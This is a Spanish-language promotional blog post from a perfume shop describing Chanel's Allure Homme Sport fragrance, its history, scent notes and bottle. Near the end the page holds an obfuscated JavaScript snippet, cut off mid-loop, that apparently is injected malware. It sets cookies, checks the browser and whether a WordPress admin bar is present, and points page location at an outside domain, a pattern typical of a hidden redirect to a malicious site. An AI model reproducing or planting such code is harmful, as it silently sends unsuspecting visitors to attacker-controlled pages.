Comprar perfume Allure Homme Sport Chanel online

Hoy venimos con un post sobre un perfume de hombre perfecto para esta época del año que comenzamos.

Y es que con la llegada del verano apetecen perfumes frescos pero que no pierdan personalidad, desde Perfumerías Tin Tin les recomendamos el perfume de hombre ALLURE HOMME SPORT de CHANEL.

ALLURE HOMME SPORT es la versión del multifacético perfume Allure de CHANEL. En el año 1999 CHANEL se lanza al mercado ALLURE la que sería su cuarta fragancia masculina.

No podemos entender el perfume ALLURE HOMME SPORT sin mencionar a la original ALLURE, y es que el perfume ALLURE de CHANEL surgió como el resultado de una explosiva composición de cuatro grandes familias de aromas, una peculiaridad ya que en un único perfume encontramos cuatro rasgos diferentes de personalidad: especiada, amaderada, sensual y fresca.

Desde CHANEL se lanzó una versión sport  Eau de Toilett en 2007 en el que centraba su enfásis en los rasgos más frescos del perfume original. Y que vamos a decir, funcionó.

Actualmente el perfume ALLURE HOMME SPORT de CHANEL se ha convertido en uno de los perfumes de hombre más vendidos superando en número de envases vendidos al perfume ALLURE.

La clave del éxito del perfume ALLURE HOMME SPORT es su rica personalidad sensual, aromática siendo elegido hace unos años como uno de los 10 perfumes de hombre favoritos de las mujeres francesas.

ALLURE HOMME SPORT  según CHANEL puede ser llevado por hombres y mujeres ya que es: ¡tan esencial como una camisa blanca en el armario!
Y os preguntaréis, ¿a qué huele el perfume de hombre ALLURE HOMME SPORT?
chanel-allure-homme-sport-cologne-sport-vaporizador
Se trata de una composición cítrica de larga duración que proporciona una inyección de bienestar. ” La visión moderna de una Eau de Cologne”.
En sus notas de salida encontramos cítricos como la naranja y la mandarina (tonificantes) porque son estas notas las que inconscientemente asociamos con la sensación de limpieza, además destacan los aldehídos que potencian esa sensación, y notas acuáticas que juegan con la idea de deportes al aire libre que atraviesan el océano como la vela. Como curiosidad comentar que CHANEL PARFUMEUR controla cada paso, desde la elección de las materias primas hasta el perfume. Siendo la mandarina utilizada en este perfume seleccionada en Sicilia y recolectada a mano y purificada de forma experta para obtener la mejor calidad.
Como notas de corazón madera de cedro del Atlas y pimienta, con un toque de nerolí para darle cuerpo a su faceta floral. Proporcionando ese toque vibrante y especiado.
En sus notas de fondo se repiten el haba tonka y la vainilla, acompañados de vetiver, almizcle blanco y ámbar para darle sensualidad y persistencia.
Su envase.
Diseñado por Jacques Helleu, el que fuera responsable también de ALLURE, y mantiene una forma muy similar a éste.Un frasco en cristal tan transparente y puro como la fragancia.
ALLURE HOMME SPORT se complementa con una gama de productos que no te dejaran indiferente:

chanel

No olvides que en Perfumerías Tin Tin somos distribuidores oficiales online de los productos CHANEL, encuentra todo el catalogo de productos CHANEL en nuestra perfumería online.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone